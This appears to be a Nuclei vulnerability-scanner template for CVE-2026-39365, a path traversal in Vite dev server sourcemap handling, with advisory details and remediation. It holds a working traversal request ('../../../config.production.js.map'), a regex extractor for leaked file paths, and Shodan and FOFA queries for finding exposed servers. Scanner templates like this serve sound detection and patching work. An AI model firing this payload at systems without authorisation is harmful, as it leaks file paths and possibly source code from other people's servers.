id: CVE-2026-39365

info:
  name: Vite Dev Server - Path Traversal in Optimized Deps .map Handling
  author: theamanrawat
  severity: medium
  description: |
    Vite development server versions prior to 8.0.5, 7.3.2, and 6.4.2 are vulnerable to path traversal through the optimized dependencies sourcemap handler.
    The dev server's handling of .map requests for optimized dependencies resolves file paths via normalizePath(path.resolve(root, url.slice(1))) and calls readFile without restricting ../ segments in the URL.
    This allows an attacker to bypass server.fs.strict and retrieve auto-generated sourcemaps for files located outside the project root, leaking absolute filesystem paths.
    Only dev servers explicitly exposed to the network using --host or server.host are affected.
  impact: |
    An attacker can trigger auto-generated sourcemap responses for files outside the project directory, leaking absolute filesystem paths and potentially reading .map files containing sensitive source code or configuration data.
  remediation: Upgrade Vite to version 8.0.5, 7.3.2, 6.4.2 or later.
  reference:
    - https://github.com/advisories/GHSA-4w7w-66w2-5vf9
    - https://github.com/vitejs/vite/security/advisories/GHSA-4w7w-66w2-5vf9
    - https://nvd.nist.gov/vuln/detail/CVE-2026-39365
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-39365
    epss-score: 0.02283
    epss-percentile: 0.84973
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/@vite/client" port:"5173"
    fofa-query: body="/@vite/client" && port="5173"
  tags: cve,cve2026,vite,lfi,path-traversal,vuln,unauthenticated,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "/@vite/client"
        internal: true

      - type: status
        status:
          - 200
        internal: true

  - raw:
      - |
        GET /node_modules/.vite/deps/../../../config.production.js.map HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"version\":3"
          - "\"mappings\""
        condition: and

      - type: regex
        part: body
        regex:
          - "\"file\":\"/"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "\"file\":\"([^\"]+)\""
# digest: 4a0a00473045022047d5a310567db68bdc2c04dca55d9d2daac4e842880271fea1b99f460b1b2bfc0221008f221fdab5a10c4d1dffe3137379656c6bdddc713a06df3b7a54b17050dd31b4:922c64590222798bb761d5b6d8e72950